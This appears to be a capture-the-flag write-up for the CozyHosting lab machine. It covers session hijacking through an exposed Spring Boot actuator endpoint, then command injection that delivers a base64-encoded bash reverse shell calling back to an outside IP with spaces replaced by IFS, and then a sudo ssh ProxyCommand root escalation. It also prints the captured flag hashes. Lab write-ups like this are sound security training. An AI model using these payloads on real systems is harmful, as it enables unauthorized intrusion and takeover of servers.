Looking at hacktricks, it states that one of the common misconfigurations of SpringBoot is the use of actuators.
With reference to this article, it states the following :
The Spring Boot Framework includes a number of features called actuators to help you monitor and manage your web application when you push it to production. Intended to be used for auditing, health, and metrics gathering, they can also open a hidden door to your server when misconfigured.
The article also provides a wordlist for directory/file fuzzing at SecList's spring-boot.txt
We can use this wordlist to fuzz all the possible actuator endpoints.
The sessions endpoint provides information about the applicationโs HTTP sessions that are managed by Spring Session.
Visiting the endpoint, we get presented with a bunch of random strings with the username kanderson.
If we try to login with any invalid credentials, we notice a JSESSION id being created with a similar value to the random strings at /actuator/sessions.
Thus, we can come up with the assumption that the random strings are actually session cookies which we can use to login as kanderson.
Immediately we see an interesting function at the bottom where it seems to be running some sort of ssh authentication in the backend.
This is further confirmed upon intercepting the request with burp, it is revealed to be making a POST request to the endpoint/executessh with a error message Host Key Verification Failed, a common ssh error.
If we put a ; in the username parameter, we get a ssh usage output, suggesting that this parameter is vulnerable to some form of command injection.
We can thus try to execute our reverse shell payload, using base64 to reduce the number of spaces and substituting spaces with the IFS trick.
POST/executesshHTTP/1.1Host:cozyhosting.htbContent-Length:157Cache-Control:max-age=0Upgrade-Insecure-Requests:1Origin:http://cozyhosting.htbContent-Type:application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer:http://cozyhosting.htb/adminAccept-Encoding:gzip,deflateAccept-Language:en-US,en;q=0.9Cookie:JSESSIONID=BC2923D993EC2C13F990C14949CAE896Connection:closehost=127.0.0.1&username=;$(echo${IFS}L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk2LzEyMzQgMD4mMQ==${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}/bin/bash${IFS})
Initial Access
Running whoami we discover that we are the user app and there is a .jar file named cloudhosting-0.0.1.jar.
We can then test for password reuse via ssh for the user josh using the cracked password, obtaining the user flag.
โโโ(kaliใฟkali)-[~/Desktop/CTF/Boxes/CozyHosting]โโ$sshjosh@10.10.11.230josh@10.10.11.230's password: Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed Sep 6 04:53:32 PM UTC 2023 System load: 0.0185546875 Usage of /: 58.8% of 5.42GB Memory usage: 51% Swap usage: 0% Processes: 337 Users logged in: 1 IPv4 address for eth0: 10.10.11.230 IPv6 address for eth0: dead:beef::250:56ff:feb9:f41dExpanded Security Maintenance for Applications is not enabled.0 updates can be applied immediately.Enable ESM Apps to receive additional future security updates.See https://ubuntu.com/esm or run: sudo pro statusThe list of available updates is more than a week old.To check for new updates run: sudo apt updateFailed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settingsLast login: Wed Sep 6 16:48:01 2023 from 10.10.16.29josh@cozyhosting:~$ cat user.txt22df2ef7ff8702a965de417990f63fafjosh@cozyhosting:~$
Privilege Escalation
Using the command sudo -l, we discover that josh has the ability to run ssh as root, probbaly due to the insecure feature on the web application earlier.
josh@cozyhosting:~$sudo-l[sudo] password for josh: MatchingDefaultsentriesforjoshonlocalhost:env_reset,mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,use_ptyUserjoshmayrunthefollowingcommandsonlocalhost: (root) /usr/bin/ssh*
We can thus reference GTFOBins to obtain a root shell.
josh@cozyhosting:~$sudossh-oProxyCommand=';sh 0<&2 1>&2'x# whoamiroot# cd /root# lsroot.txt# cat root.txt6d241c85ff618d112b8b6f52edbf613d#